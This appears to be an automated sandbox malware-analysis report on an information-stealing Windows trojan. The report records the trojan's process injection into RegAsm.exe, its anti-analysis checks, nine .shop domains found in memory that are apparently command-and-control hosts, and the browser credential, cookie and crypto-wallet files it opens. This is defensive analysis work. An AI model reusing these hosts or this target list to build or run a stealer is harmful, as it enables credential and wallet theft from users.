        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00404B301_2_00404B30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00402D101_2_00402D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043EE701_2_0043EE70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004370901_2_00437090
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004080A01_2_004080A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004041601_2_00404160
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042213D1_2_0042213D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043F1901_2_0043F190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041D35E1_2_0041D35E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004033601_2_00403360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004103901_2_00410390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004064801_2_00406480
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043F5001_2_0043F500
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004057201_2_00405720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042C85E1_2_0042C85E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406A501_2_00406A50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00428AC01_2_00428AC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00425B501_2_00425B50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00439E101_2_00439E10
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: String function: 00FD6A00 appears 49 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410520 appears 194 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408AF0 appears 52 times
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: Section: .Left ZLIB complexity 0.998236469568567
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00430169 CoCreateInstance,1_2_00430169
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeVirustotal: Detection: 46%
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: section name: .DAX
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: section name: .Left
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeStatic PE information: section name: .INV
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD6158 push ecx; ret 0_2_00FD616B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FF5F3D push esi; ret 0_2_00FF5F46
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004337E3 push esp; iretd 1_2_004337E7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeAPI coverage: 5.7 %
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6756Thread sleep time: -90000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6736Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FE8F57 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00FE8F57
        Source: RegAsm.exe, 00000001.00000002.1733522078.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043B550 LdrInitializeThunk,1_2_0043B550
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD67DD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD67DD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FEA021 mov eax, dword ptr fs:[00000030h]0_2_00FEA021
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FE010F mov ecx, dword ptr fs:[00000030h]0_2_00FE010F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FEC620 GetProcessHeap,0_2_00FEC620
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD6939 SetUnhandledExceptionFilter,0_2_00FD6939
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD6A4A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FD6A4A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD67DD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD67DD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FDA713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FDA713

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: boredimperissvieos.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: plaintediousidowsko.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: miniaturefinerninewjs.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: holicisticscrarws.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: sweetsquarediaslw.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: acceptabledcooeprs.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: pearcyworkeronej.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: zippyfinickysofwps.shop
        Source: SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeString found in binary or memory: obsceneclassyjuwks.shop
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 457000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 84D008Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD64BC cpuid 0_2_00FD64BC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetLocaleInfoW,0_2_00FEC0C0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: EnumSystemLocalesW,0_2_00FE5022
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00FEC1E9
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetLocaleInfoW,0_2_00FEC2EF
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00FEC3BE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: EnumSystemLocalesW,0_2_00FEBCFC
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: EnumSystemLocalesW,0_2_00FEBDE2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetLocaleInfoW,0_2_00FE5548
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: EnumSystemLocalesW,0_2_00FEBD47
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00FEBE6D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.17272.18065.exeCode function: 0_2_00FD66D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FD66D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: RegAsm.exe, 00000001.00000002.1733522078.0000000000E3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
        Source: RegAsm.exe, 00000001.00000002.1733951463.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
        Source: RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: RegAsm.exe, 00000001.00000002.1733684610.0000000000E75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
